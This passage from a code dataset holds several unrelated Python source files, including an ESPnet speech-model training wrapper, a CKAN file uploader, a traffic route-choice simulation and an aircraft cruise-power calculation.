try:\n word_param['e_mean'] = line[1]\n except IndexError:\n word_param['e_mean'] = ''\n\n try:\n word_param['k_mean'] = line[2]\n except IndexError:\n word_param['k_mean'] = ''\n\n try:\n word_param['sentence'] = line[3]\n except IndexError:\n word_param['sentence'] = ''\n word_list.append(Word(word=word_param['word'],\n e_mean=word_param['e_mean'],\n k_mean=word_param['k_mean'],\n sentence=word_param['sentence']))\n file.close()\n return word_list\n","sub_path":"tb_voca/word_io.py","file_name":"word_io.py","file_ext":"py","file_size_in_byte":1837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"635242917","text":"__author__ = 'ksharma'\n\nimport urllib2\nimport json\nimport time\nimport sys\nimport signal\nimport datetime\n\n\ndef signal_handler(signal, frame):\n sys.exit(0)\n\nsignal.signal(signal.SIGINT, signal_handler)\n\ndef main():\n # try:\n while True:\n response = urllib2.urlopen('https://btc-e.com/api/2/btc_usd/ticker')\n data = json.load(response)\n print(\"[\" + datetime.datetime.fromtimestamp(int(data['ticker']['updated'])).strftime('%Y-%m-%d %H:%M:%S') + \"] \"\n + \"Bid: \" + str(data['ticker'][\"buy\"]) + \" | \" + \"Ask: \" + str(data['ticker'][\"sell\"]) + \" || \" +\n \"Last: \" + str(data['ticker'][\"last\"]))\n time.sleep(1)\n # except:\n # print(\"Closing connection\")\n\nif __name__ == \"__main__\":\n main()","sub_path":"btce/market_data.py","file_name":"market_data.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"260723280","text":"import MDSplus as mds\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cm\nfrom matplotlib.widgets import Slider, Button\nimport sys\n\nshot_number = 113\ntree = mds.Tree(\"mpts_manual\", shot_number)\n\ncamera = tree.getNode(\"\\\\Phantom1\")\ndata = camera.SIGNAL.getData().data()\n\nfig, ax = plt.subplots(1, 1)\nplt.subplots_adjust(bottom=0.25)\nax.pcolormesh(data[0, :, :], cmap=cm.gray)\nax.set_aspect('auto')\n(frames, numcols, numrows) = data.shape\n\n# ax.set_ylim(0, 15)\n# ax.set_xlim(shot.X['K'].min(), shot.X['K'].max())\n# ax.set_ylabel(\"beating freq. (MHz)\")\n# ax.set_xlabel(\"freq (GHz)\")\nplt.title = fig.suptitle(\"# %s - Frame: %d\" % (shot_number, 1))\n\naxfreq = plt.axes([0.25, 0.1, 0.5, 0.03])\n\nsweep = Slider(axfreq, 'Sweep', 0, frames - 1, valinit=1, valfmt='%d')\n\n\ndef update(val):\n i = int(sweep.val)\n ax.pcolormesh(data[i, :, :], cmap=cm.gray)\n plt.title = fig.suptitle(\"# %s - Frame: %d\" % (shot_number, i))\n fig.canvas.draw_idle()\n\n\nsweep.on_changed(update)\n\nresetax = plt.axes([0.8, 0.025, 0.1, 0.04])\nbutton = Button(resetax, 'Reset', hovercolor='0.975')\n\n\ndef reset(event):\n sweep.reset()\n\n\nbutton.on_clicked(reset)\n\nplt.show()\n","sub_path":"tools/plot_data_cam2.py","file_name":"plot_data_cam2.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"67189198","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"Funciones auxiliares\"\"\"\n\nimport os\nimport shutil\nfrom openpyxl import load_workbook\nimport zipfile\nimport datetime\nimport time\nfrom urllib import parse as urlparse\n\nimport yaml\nimport logging\nimport logging.config\nimport yaml\nfrom download_utils import download, download_to_file\n\nfrom paths import CONFIG_DOWNLOADS_PATH\nfrom paths import CATALOGS_INDEX_PATH, CONFIG_GENERAL_PATH\n\nFREQ_ISO_TO_HUMAN = {\n \"R/P1Y\": \"anual\",\n \"R/P6M\": \"semestral\",\n \"R/P3M\": \"trimestral\",\n \"R/P1M\": \"mensual\",\n \"R/P1D\": \"diaria\"\n}\n\nSEPARATOR_WIDTH = 60\n\n\ndef safe_sheet_name(string):\n invalid_chars = \"[]:*?/\\\\\"\n for invalid_char in invalid_chars:\n string = string.replace(invalid_char, \"_\")\n return string\n\n\ndef indicators_to_text(simple_dict):\n text = \"\\n\" + \"\\n\".join(\"{}: {}\".format(key.ljust(40), value)\n for key, value in sorted(\n list(simple_dict.items()), key=lambda x: x[0]))\n return text\n\n\ndef timeit(method):\n def timed(*args, **kw):\n ts = time.time()\n result = method(*args, **kw)\n te = time.time()\n\n print('{} ({}, {}) {%2.2f} sec'.format(method.__name__, args, kw,\n te - ts))\n return result\n\n return timed\n\n\ndef print_zipfile_info(path):\n zf = zipfile.ZipFile(path)\n for info in zf.infolist():\n print(info.filename)\n print('\\tComment:\\t', info.comment)\n print('\\tModified:\\t', datetime.datetime(*info.date_time))\n print('\\tSystem:\\t\\t', info.create_system, '(0 = Windows, 3 = Unix)')\n print('\\tZIP version:\\t', info.create_version)\n print('\\tCompressed:\\t', info.compress_size, 'bytes')\n print('\\tUncompressed:\\t', info.file_size, 'bytes')\n\n\ndef compress_file(from_path, to_path):\n zf = zipfile.ZipFile(to_path, 'w', zipfile.ZIP_DEFLATED)\n try:\n zf.write(from_path, os.path.basename(from_path))\n finally:\n zf.close()\n # print_zipfile_info(to_path)\n\n\ndef freq_iso_to_xlseries(freq_iso8601):\n frequencies_map = {\n \"R/P1Y\": \"Y\",\n \"R/P6M\": \"S\",\n \"R/P3M\": \"Q\",\n \"R/P1M\": \"M\",\n \"R/P1D\": \"D\"\n }\n return frequencies_map[freq_iso8601]\n\n\ndef freq_iso_to_pandas(freq_iso8601, how=\"start\"):\n frequencies_map_start = {\n \"R/P1Y\": \"AS\",\n \"R/P6M\": \"6MS\",\n \"R/P3M\": \"QS\",\n \"R/P1M\": \"MS\",\n \"R/P1D\": \"DS\"\n }\n frequencies_map_end = {\n \"R/P1Y\": \"A\",\n \"R/P6M\": \"6M\",\n \"R/P3M\": \"Q\",\n \"R/P1M\": \"M\",\n \"R/P1D\": \"D\"\n }\n if how == \"start\":\n return frequencies_map_start[freq_iso8601]\n elif how == \"end\":\n return frequencies_map_end[freq_iso8601]\n else:\n raise Exception(\n \"{} no se reconoce para 'how': debe ser 'start' o 'end'\".format(\n how))\n\n\ndef remove_other_files(directory):\n \"\"\"Se asegura de que un directorio exista.\"\"\"\n ensure_dir_exists(directory)\n shutil.rmtree(directory)\n ensure_dir_exists(directory)\n\n\ndef ensure_dir_exists(directory):\n \"\"\"Se asegura de que un directorio exista.\"\"\"\n if not os.path.exists(directory):\n os.makedirs(directory)\n\n\ndef get_ws_case_insensitive(wb, title):\n \"\"\"Devuelve una hoja en un workbook sin importar mayúsculas/minúsculas.\"\"\"\n return wb[find_ws_name(wb, title)]\n\n\ndef find_ws_name(wb, name):\n \"\"\"Busca una hoja en un workbook sin importar mayúsculas/minúsculas.\"\"\"\n if type(wb) == str or type(wb) == str:\n wb = load_workbook(wb, read_only=True, data_only=True)\n\n for sheetname in wb.sheetnames:\n if sheetname.lower() == name.lower():\n return sheetname\n\n return None\n\n\ndef row_from_cell_coord(coord):\n return int([x for x in coord if x.isdigit()])\n\n\ndef load_yaml(path):\n with open(path, encoding=\"utf-8\") as config_file:\n return yaml.load(config_file)\n\n\ndef get_catalogs_index():\n return load_yaml(CATALOGS_INDEX_PATH)\n\n\ndef get_general_config():\n return load_yaml(CONFIG_GENERAL_PATH)\n\n\ndef get_logger(name=__name__):\n levels = {\n 'critical': logging.CRITICAL,\n 'error': logging.ERROR,\n 'warning': logging.WARNING,\n 'info': logging.INFO,\n 'debug': logging.DEBUG\n }\n\n config = get_general_config()\n selected_level = levels[config['logging']]\n\n logger = logging.getLogger(name)\n logger.setLevel(selected_level)\n\n ch = logging.StreamHandler()\n ch.setLevel(selected_level)\n\n logging_formatter = logging.Formatter(\n '%(asctime)s - %(name)s - %(levelname)s - %(message)s',\n '%Y-%m-%d %H:%M:%S')\n ch.setFormatter(logging_formatter)\n logger.addHandler(ch)\n\n return logger\n\n\nlogger = get_logger(os.path.basename(__file__))\n\n\ndef print_log_separator(logger, message):\n logger.info(\"=\" * SEPARATOR_WIDTH)\n logger.info(\"|\" + \" \" * (SEPARATOR_WIDTH - 2) + \"|\")\n\n logger.info(\"|\" + message.center(SEPARATOR_WIDTH - 2) + \"|\")\n\n logger.info(\"|\" + \" \" * (SEPARATOR_WIDTH - 2) + \"|\")\n logger.info(\"=\" * SEPARATOR_WIDTH)\n\n\ndef is_http_or_https(url):\n return urlparse.urlparse(url).scheme in [\"http\", \"https\"]\n\n\ndef get_catalog_download_config(catalog_id):\n try:\n configs = load_yaml(CONFIG_DOWNLOADS_PATH)\n except:\n logger.warning(\n \"No se pudo cargar el archivo de configuración 'config_downloads.yaml'.\"\n )\n logger.warning(\"Utilizando configuración default...\")\n configs = {\"defaults\": {}}\n\n default_config = configs[\"defaults\"]\n\n config = configs[catalog_id] if catalog_id in configs else {}\n if \"catalog\" not in config:\n config[\"catalog\"] = {}\n if \"sources\" not in config:\n config[\"sources\"] = {}\n\n for key, value in list(default_config.items()):\n for subconfig in list(config.values()):\n if key not in subconfig:\n subconfig[key] = value\n\n return config\n\n\ndef download_with_config(url, file_path, config):\n download_to_file(url, file_path, **config)\n","sub_path":"scripts/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":6060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"485149849","text":"#!usr/bin/env python\nfrom pt import PT\nimport cPickle\n\n\n# build the Patricia Tree and save it to a pickle file so that we can load it\n# from disk\ndef build(fName_in, fName_out):\n pt = PT()\n with open(fName_in, \"rb\") as g:\n unpickler = cPickle.Unpickler(g)\n while True:\n try:\n row = unpickler.load()\n pt.insert(row[0], row[1:])\n except EOFError:\n break\n g.close()\n with open(fName_out, \"wb\") as gt:\n pickler = cPickle.Pickler(gt)\n pickler.dump(pt)\n gt.close()\n\n\nif __name__ == \"__main__\":\n build(\"../pickle_data/geodatanew.pkl\", \"../pickle_data/geo_pt.pkl\")\n","sub_path":"pt/build_pt.py","file_name":"build_pt.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"630348700","text":"\"\"\" Support for training ESPnet models.\"\"\"\nimport os\nfrom pathlib import Path\nimport re\nimport shutil\nimport subprocess\nimport threading\nfrom typing import Callable\n\nfrom elpis.engines.common.objects.command import run\nfrom elpis.engines.common.objects.dataset import Dataset\nfrom elpis.engines.common.objects.model import Model as BaseModel\nfrom elpis.engines.kaldi.input.json_to_kaldi import create_kaldi_structure\n\n\nclass EspnetModel(BaseModel):\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n # ESPnet does not use a pronunciation dictionary so this will not\n # change from None.\n self.pron_dict = None\n self.config['pron_dict_name'] = None\n # ESPnet doesn't use an n-gram language model, so this will not change\n # from None.\n self.config['ngram'] = None\n self.config['engine_name'] = 'espnet'\n self.config['status'] = 'untrained'\n stage_names = {\n \"train\": \"Train\"\n }\n super().build_stage_status(stage_names)\n self.venv_path = Path(\"/espnet/tools/venv/bin/python3\")\n self.config['gpus'] = int(subprocess.check_output(f\"{self.venv_path} -c 'import torch; print(torch.cuda.device_count())'\", shell=True))\n print(f\"Number of GPUs: {self.config['gpus']}\")\n\n @classmethod\n def load(cls, base_path: Path):\n self = super().load(base_path)\n self.pron_dict = None\n return self\n\n @property\n def status(self):\n # Update stage status\n run_log_path = self.path.joinpath('train.log')\n if not run_log_path.is_file():\n run(f\"touch {run_log_path};\")\n with open(run_log_path) as log_file:\n log_text = log_file.read()\n self.stage_status = (\"train\", 'in-progress', '', log_text)\n # Stage 4 train log is not written to the main train log, so read it from the exp dir\n is_stage_4 = re.search('stage 4: Network Training\\n\\Z', log_text, flags=re.MULTILINE)\n if is_stage_4:\n # Train stage 4 log is in the exp dir... something like exp/train_nodev_pytorch_train_mtlalpha1.0\n path_gen = self.path.glob(\"espnet-asr1/exp/train*/train.log\")\n # Assumes just one decode_test* directory, which is true in the current\n # implementation (transcription will use decode_infer*...)\n stage_4_log_path = next(path_gen, None)\n with open(stage_4_log_path) as stage_4_log_file:\n stage_4_text = stage_4_log_file.read()\n self.stage_status = (\"train\", \"in-progress\", \"\", f\"{log_text}\\n{stage_4_text}\")\n return self.config['status']\n\n @status.setter\n def status(self, value: str):\n self.config['status'] = value\n\n def has_been_trained(self):\n return self.status == 'trained'\n\n def link(self, dataset: Dataset, _pron_dict):\n self.dataset = dataset\n self.config['dataset_name'] = dataset.name\n # Note the _pron_dict is ignored as it's irrelevant to ESPnet.\n\n def build_structure(self):\n print(\"BUILD STRUCTURE\")\n # NOTE Since the ESPnet data is similar to Kaldi in terms of formatting requirements,\n # code is unfortunately being duplicated from KaldiModel.\n # I'm not sure the best way to get around this, but calling create_kaldi_structure()\n # here does limit that duplication somewhat.\n output_path = self.path.joinpath('output')\n output_path.mkdir(parents=True, exist_ok=True)\n\n print(\"OUTPUT PATH: {}\".format(output_path))\n\n # Copy cleaned corpus from dataset to the model\n dataset_corpus_txt = self.dataset.path.joinpath('cleaned', 'corpus.txt')\n model_corpus_txt = self.path.joinpath('corpus.txt')\n if dataset_corpus_txt.exists():\n shutil.copy(f'{dataset_corpus_txt}', f'{model_corpus_txt}')\n create_kaldi_structure(\n input_json=f'{self.dataset.pathto.annotation_json}',\n output_folder=f'{output_path}',\n silence_markers=False,\n corpus_txt=f'{model_corpus_txt}'\n )\n\n def train(self, on_complete:Callable=None):\n\n def prepare_for_training():\n # This should just copy the ESPnet experiment directory into the\n # model directory and then copy the prepared train/test langdir\n # stuff into the appropriate subdirectory.\n\n # First make a copy of the ESPNET Elpis recipe\n local_espnet_path = self.path.joinpath(\"espnet-asr1\")\n shutil.copytree(\"/espnet/egs/elpis/asr1\", f\"{local_espnet_path}\")\n\n # Then move the train/test data across.\n src_train_dir = self.path.joinpath(\"output/training\")\n tgt_train_dir = local_espnet_path.joinpath(\"data/train\")\n shutil.copytree(src_train_dir, tgt_train_dir)\n\n src_test_dir = self.path.joinpath(\"output/testing\")\n tgt_test_dir = local_espnet_path.joinpath(\"data/test\")\n shutil.copytree(src_test_dir, tgt_test_dir)\n\n # Then move the WAVs across\n src_wav_dir = self.dataset.path.joinpath(\"resampled\")\n for wav in src_wav_dir.glob(\"*.wav\"):\n shutil.copy(wav, local_espnet_path)\n\n def train():\n local_espnet_path = self.path.joinpath(\"espnet-asr1\")\n run_log_path = self.path.joinpath('train.log')\n print(f\"SELF PATH {self.path}\")\n if run_log_path.is_file():\n os.remove(run_log_path)\n try:\n p = run(f\"cd {local_espnet_path}; ./run.sh --ngpu {self.config['gpus']} --nj 1 &> {run_log_path}\")\n print('done')\n self.status = 'trained'\n except subprocess.CalledProcessError as e:\n with open(run_log_path, 'a+') as file:\n print('stderr', e.stderr, file=file)\n print('failed', file=file)\n print('failed')\n self.status = f'failed with code {e.returncode}'\n\n def run_training_in_background():\n def background_train_task():\n prepare_for_training()\n train() \n self.results = EspnetModel.get_train_results(self)\n on_complete()\n self.status = 'training'\n t = threading.Thread(target=background_train_task)\n t.start()\n\n if on_complete is None:\n print(\"oncomplete is none\")\n self.status = 'training'\n prepare_for_training()\n train()\n self.status = 'trained'\n self.results = EspnetModel.get_train_results(self)\n else:\n print(\"oncomplete is not none\")\n run_training_in_background()\n return\n\n def get_train_results(self):\n path_gen = self.path.glob(\"espnet-asr1/exp/train*/decode_test*/result.txt\")\n # Assumes just one decode_test* directory, which is true in the current\n # implementation (transcription will use decode_infer*...)\n log_file = next(path_gen)\n with open(log_file) as f:\n text = f.read()\n\n # Regex to detect floating point numbers\n val = r\"[^ ]+\"\n avg_line_re = (rf\"Sum/Avg *\\| *\\d+ *\\d+ *\\| *{val} *\" +\n rf\"(?P{val}) *(?P{val}) *(?P{val}) *(?P{val}) *{val}\"\n )\n try:\n sub = re.search(avg_line_re, text).group(\"sub\")\n del_ = re.search(avg_line_re, text).group(\"del\")\n ins = re.search(avg_line_re, text).group(\"ins\")\n per = re.search(avg_line_re, text).group(\"per\")\n except AttributeError:\n per = sub = ins = del_ = None\n\n results = {\"comparison_val\": float(per), # property common to all engines so the GUI can sort models by a result value\n \"per\": float(per),\n \"ins_val\": int(float(ins)),\n \"del_val\": int(float(del_)),\n \"sub_val\": int(float(sub))}\n\n print(results)\n return results\n","sub_path":"elpis/engines/espnet/objects/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":8078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"155981492","text":"from agents import *\nfrom environment import *\nimport pickle\n\n# Init variables\nhv = 500 # n of HVs\nav = 500 # n of AVs\nN = 500 # n of Days\norig = '1'\ndest = '9'\nhv_err = 5 # error term on HV time perception ~N(0, hv_err)\nhv_theta = .5 # rationality\nhv_beta = .5 # prob of change route\nhv_len = 3 # Memory lenth\nhv_atis_bais = 0 # bias*prevTT + (1-bais)*memTT\nav_err = 0\nav_theta = 1\nav_len = 1000 \nav_atis_bias = 0\n\n# Data save paths\nroute_dir = f\"data/sim-ROUTES-N{N}-hv{hv}at{hv_err}_{hv_theta}_{hv_beta}_{hv_len}_{hv_atis_bais}-av{av}at{av_err}_{av_theta}_{av_len}_{av_atis_bias}.pickle\"\nroads_dir = f\"data/sim-ROADS-N{N}-hv{hv}at{hv_err}_{hv_theta}_{hv_beta}_{hv_len}_{hv_atis_bais}-av{av}at{av_err}_{av_theta}_{av_len}_{av_atis_bias}.pickle\"\n\n# Square Network\nroads = [Road('1', '2', 720, 20), Road('2', '3', 720, 12), Road('1', '4', 480, 15), Road('2', '5', 360, 12),\n\tRoad('3', '6', 720, 12), Road('4', '5', 300, 10), Road('5', '6', 360, 12), Road('4', '7', 480, 15),\n\tRoad('5', '8', 300, 10), Road('6', '9', 720, 30), Road('7', '8', 480, 15) ,Road('8', '9', 480, 15)]\n\n# Make Network from roads\nnetwork = Network(roads)\n\n# Make drivers\ndrivers = [HV(orig, dest, err = hv_err, theta = hv_theta, beta = hv_beta, L = hv_len) for i in range(0, hv)]\nif av > 0:\n drivers = drivers + [AV(orig, dest, theta = av_theta, err = av_err, L = av_len, atis_bias = av_atis_bias) for i in range(0, av)]\n\n# Day 1\nfor driver in drivers:\n driver.learn(network)\nnetwork.update(drivers)\n\n# Make logs\ncount_log = pd.DataFrame(columns = [f'Road{i}' for i in range(len(network.roadlist))])\nroute_log = pd.DataFrame(columns = [f'Route{i}' for i in range(len(drivers[0].routes))])\n\n# Save day 1 data\ncount_log.loc[0] = [road.count for road in network.roadlist]\nroute_count = [0 for route in range(len(drivers[0].routes))]\nfor driver in drivers:\n # Add one to route i, if driver took root i\n route_count[driver.i] = route_count[driver.i] + 1 \nroute_log.loc[0] = route_count\n\n# Day > 1 Loop\nfor i in range(1,N):\n\n # Simulate\n for driver in drivers:\n driver.drive(network)\n network.update(drivers)\n \n # Save data\n count_log.loc[i] = [road.count for road in network.roadlist]\n route_count = [0 for route in route_log.keys()]\n for driver in drivers:\n route_count[driver.i] = route_count[driver.i] + 1\n route_log.loc[i] = route_count\n\n# Export data to file for analysis\npickle.dump(route_log, open(route_dir, \"wb\" ))\npickle.dump(count_log, open(roads_dir, \"wb\" ))","sub_path":"sim/sim_script_demo.py","file_name":"sim_script_demo.py","file_ext":"py","file_size_in_byte":2544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"141012047","text":"#!/usr/local/bin/python\n# -*- coding: utf-8 -*-\n\n\n# # We'll use the package_create function to create a new dataset.\n# request = urllib2.Request(\n# 'http://www.my_ckan_site.com/api/action/package_create')\n# \n# # Creating a dataset requires an authorization header.\n# # Replace *** with your API key, from your user account on the CKAN site\n# # that you're creating the dataset on.\n# request.add_header('Authorization', 'a059851e-dea1-4638-aeb4-1c4a7d789fa5')\n# \n\n\nimport argparse\nimport requests\nimport os.path\nimport urllib.request\nimport re\nimport sys\nimport time\n\nfrom urllib.parse import urlparse\nfrom urllib.error import URLError\nfrom cli_utils import url_exists, prompt\n\nimport ckanapi\n\n\nclass CkanUtil:\n\n def __init__(self, ckan_server, api_key):\n self.server = ckan_server\n self.api_key = api_key\n self.ckan_inst = ckanapi.RemoteCKAN(\n self.server,\n apikey=self.api_key,\n user_agent='CKAN SHP Uploader'\n )\n\n def fileUpload(self, dataset_name, dataset_title, filepath):\n print('fileUpload --> '+dataset_name+' :: '+filepath)\n try:\n pkg = self.ckan_inst.action.package_create(\n name=dataset_name,\n title=dataset_title,\n owner_org='vta')\n except ckanapi.NotAuthorized as ex:\n print('access denied. Is your API key valid?')\n print(ex)\n return\n\n self.ckan_inst.action.resource_create(\n package_id=dataset_name,\n upload=open(filepath, 'rb'),\n url='',\n format='csv')\n\n\nclass Uploader:\n def __init__(self):\n self.server_url = None\n self.api_key = None\n self.dataset_name = None\n self.filename = None\n\n def prompt_args(self):\n \n self.server_url = prompt(\n message = \"Enter the URL of the CKAN server\", \n errormessage= \"The URL you provides is not valid (it must be the full URL)\",\n isvalid = lambda v : url_exists(v))\n\n self.api_key = prompt(\n message = \"Enter the API key to use for uploading\", \n errormessage= \"A valid API key must be provided. This key can be found in your user profile in CKAN\",\n isvalid = lambda v : re.search(r\"(([^-])+-){4}[^-]+\", v))\n\n self.filename = prompt(\n message = \"Enter the path of the file to upload\", \n errormessage= \"The file path you provided does not exist\",\n isvalid = lambda v : os.path.isfile(v))\n\n self.dataset_name = prompt(\n message = \"Enter the name of the dataset you want to create\", \n errormessage= \"The dataset must be named\",\n isvalid = lambda v : len(v) > 0)\n\n\n def upload(self):\n ckan = CkanUtil(self.server_url, self.api_key)\n ckan.fileUpload(self.dataset_name, self.filename)\n\n def to_string(self):\n return self.server_url +' '+ self.api_key +' '+ self.dataset_name +' '+ self.filename\n\n\ndef url_exists(url):\n parsed_url = urlparse(url)\n if not bool(parsed_url.scheme):\n argparse.ArgumentTypeError(\"{0} is not a valid URL\".format(url))\n try:\n urllib.request.urlopen(url)\n return url # URL Exist\n except ValueError:\n # URL not well formatted\n argparse.ArgumentTypeError(\"{0} is not a valid URL\".format(url))\n except URLError:\n # URL don't seem to be alive\n argparse.ArgumentTypeError(\"could not connect to the server at {0}\".format(url))\n\n\ndef valid_api_key(arg):\n if re.search(r\"(([^-])+-){4}[^-]+\", arg):\n return arg\n raise argparse.ArgumentTypeError(\"{0} is not a valid API key\".format(arg))\n\n\ndef valid_file(fname):\n if os.path.isfile(fname):\n return fname\n raise argparse.ArgumentTypeError(\"{0} is not a valid filepath\".format(fname))\n\n\nif __name__ == '__main__':\n uploader = Uploader()\n\n # http://stackoverflow.com/a/7856172/940217\n parser = argparse.ArgumentParser(description='Upload files to CKAN')\n subparsers = parser.add_subparsers(description='available subcommands')\n\n parser_main = subparsers.add_parser('direct', help='provide input as positional arguments')\n parser_main.add_argument('url', metavar='url', type=url_exists, help='the full URL of the CKAN server')\n parser_main.add_argument('key', metavar='key', type=valid_api_key,\n help=('the API key to use for interacting with the API '\n '(this key can be found in your user profile in CKAN)'))\n parser_main.add_argument('name', metavar='name', type=str, help='the name of the dataset you want to create')\n parser_main.add_argument('title', metavar='title', type=str, help='Title to display for the dataset')\n parser_main.add_argument('filename', metavar='filename', type=valid_file, help='the path of the file to upload')\n \n parser_interactive = subparsers.add_parser('interactive', help='enter interactive mode to be prompted for input')\n \n args = parser.parse_args()\n\n ckan_util = CkanUtil(ckan_server=args.url,\n api_key=args.key)\n ckan_util.fileUpload(dataset_name=args.name,\n dataset_title=args.title,\n filepath=args.filename)\n\n # u = Uploader()\n # u.prompt_args()\n # print u.to_string()\n # u.upload()\n\n\n\n","sub_path":"upload.py","file_name":"upload.py","file_ext":"py","file_size_in_byte":5384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"351486079","text":"# Name: cruise_power_what_if.py\n# Company: MetaMorph, Inc.\n# Author(s): Austin Tabulog, Joseph Coombe\n# Email: jcoombe@metamorphsoftware.com\n# Create Date: 8/10/2017\n# Edit Date: 8/10/2017\n\n# Conversion of Airbus A^3's vahanaTradeStudy>reserveMission.mat code\n# (located here: https://github.com/VahanaOpenSource/vahanaTradeStudy ) \n# to Python 2.7 for use in the MetaMorph, Inc. OpenMETA environment.\n\n# Estimate time and energy use for a reserve VTOL mission\n# Inputs:\n# #TODO\n\n# Outputs:\n# #TODO\n\nfrom __future__ import print_function\n\nfrom openmdao.api import IndepVarComp, Component, Problem, Group, FileRef\nimport numpy as np\nimport platform\nfrom subprocess import Popen, PIPE, STDOUT\nimport os\nimport math\n\nclass CruisePower(Component):\n\n def __init__(self):\n super(CruisePower, self).__init__()\n \n self.add_param('Vehicle', val=u'abcdef', description='Vehicle type', pass_by_obj=True) # 'tiltwing' or 'helicopter'\n self.add_param('rProp', val=0.0, description='prop/rotor radius [m]')\n self.add_param('V', val=0.0, description='Cruise speed [m/s]')\n self.add_param('W', val=0.0, description='Weight of vehicle [N]')\n self.add_param('wingProfileCD', val=0.0)\n \n self.add_output('etaProp', val=0.0, description='efficiency of Prop')\n self.add_output('etaMotor', val=0.0, description='efficiency of motor')\n self.add_output('CLmax', val=0.0, description='maximum CL for aircraft, section cl is much higher')\n self.add_output('bRef', val=0.0, description='reference wingspan assuming 2 props per wing with outboard props are at wingtips, 1 meter wide fuselage plus clearance between props and fuselage')\n self.add_output('SRef', val=0.0, description='reference surface area of both wings')\n self.add_output('cRef', val=0.0, description='Chord calculation of each wing')\n self.add_output('AR', val=0.0, description='Aspect Ratio of wings')\n self.add_output('D', val=0.0, description='Force of Drag on vehicle at cruise')\n self.add_output('PCruise',val=0.0, description='Power required during cruise')\n self.add_output('PBattery', val=0.0, description='battery power required for cruise')\n self.add_output('Cd0', val=0.0, description='Overall profile drag coefficent')\n self.add_output('CL', val=0.0, description='CL during cruise')\n self.add_output('LoverD', val=0.0, description='total lift over drag')\n self.add_output('omega', val=0.0, description='angular velocity of blade tips')\n self.add_output('alpha', val=0.0, description='inflow angle')\n self.add_output('mu', val=0.0, description='advance ratio')\n self.add_output('Ct', val=0.0, description='Thrust coefficient (including tip loss factor for effective disk area)')\n self.add_output('lambda', val=0.0, description='induced velocity /w Newton method')\n self.add_output('v', val=0.0, description='TBD')\n self.add_output('SCdFuse', val=0.0, description='Drage area of fuselage and gears combined [m]')\n self.add_output('Cd0Wing', val=0.0, description='wing profile drag coefficient')\n self.add_output('e', val=0.0, description='span efficiency')\n self.add_output('B', val=0.0, description='Tip loss factor')\n self.add_output('sigma', val=0.0, description='Blade solidity')\n \n \n def solve_nonlinear(self, params, unknowns, resids):\n # Altitude, compute atmospheric properties\n rho = 1.225\n \n # Fuselage / landing gear area\n unknowns['SCdFuse'] = 0.35\n\n if(params['Vehicle'].lower().replace('-', '') == \"tiltwing\"):\n # Specify stall conditions\n VStall = 35 # m/s\n unknowns['CLmax'] = 1.1 # Whole aircraft CL, section Clmax much higher\n\n # Compute Wingspan assuming 2 props per wing with outboard props are at\n # wingtips, 1 meter wide fuselage plus clearance between props and fuselage\n unknowns['bRef'] = 6 * params['rProp'] + 1.2 # Rough distance between hubs of outermost props\n\n # Compute reference area (counting both wings)\n unknowns['SRef'] = params['W'] / (0.5 * rho * VStall**2 * unknowns['CLmax'])\n\n # Compute reference chord (chord of each wing)\n unknowns['cRef'] = 0.5 * unknowns['SRef'] / unknowns['bRef'] \n \n # Equivalent aspect ratio\n unknowns['AR'] = unknowns['bRef']**2 / unknowns['SRef']\n\n # Motor efficiency\n unknowns['etaMotor'] = 0.85\n\n # Wing profile drag coefficent\n unknowns['Cd0Wing'] = params['wingProfileCD']\n\n # Overall profile drag\n unknowns['Cd0'] = unknowns['Cd0Wing'] + unknowns['SCdFuse'] / unknowns['SRef']\n\n # Span efficiency\n unknowns['e'] = 1.3\n\n # Solve for CL at cruise\n unknowns['CL'] = params['W'] / (0.5 * rho * params['V']**2 * unknowns['SRef'])\n\n # Prop efficiency\n unknowns['etaProp'] = 0.8\n\n # Estimate drag at cruise using quadratic drag polar\n unknowns['D'] = 0.5 * rho * params['V']**2 * (unknowns['SRef'] * (unknowns['Cd0'] + \\\n unknowns['CL']**2 / (math.pi * unknowns['AR'] * unknowns['e'])) + unknowns['SCdFuse'])\n\n # Compute cruise power estimate\n unknowns['PCruise'] = unknowns['D'] * params['V']\n\n # Battery power\n unknowns['PBattery'] = unknowns['PCruise'] / unknowns['etaProp'] / unknowns['etaMotor']\n\n # Cruise L/D\n unknowns['LoverD'] = params['W'] / unknowns['D']\n\n elif (params['Vehicle'].lower().replace('-', '') == \"helicopter\"):\n # Motor efficiency\n unknowns['etaMotor'] = 0.85 * 0.98 # Assumed motor and gearbox efficiencies (85%, and 98% respectively)\n\n # Tip Mach number constraint\n MTip = 0.65\n\n # Tip loss factor \n unknowns['B'] = 0.97\n\n # Blade solidity\n unknowns['sigma'] = 0.1\n\n # Blade profile drag coefficient\n unknowns['Cd0'] = 0.012\n\n # Compute rotation rate at cruise to be at tip mach limit\n unknowns['omega'] = (340.2940 * MTip - params['V']) / params['rProp']\n\n # Fuselage drag\n unknowns['D'] = 0.5 * rho * (params['V']**2) * unknowns['SCdFuse']\n\n # Inflow angle \n unknowns['alpha'] = math.atan2(unknowns['D'], params['W'])\n\n # Compute advance ratio\n unknowns['mu'] = params['V'] * math.cos(unknowns['alpha']) / (unknowns['omega'] * params['rProp'])\n\n # Thrust coefficient (including tip loss factor for effective disk area)\n unknowns['Ct'] = params['W'] / (rho * math.pi * params['rProp']**2 * unknowns['B']**2 * unknowns['omega']**2 * params['rProp']**2)\n\n # Solve for induced velocity /w Newton method (see \"Helicopter 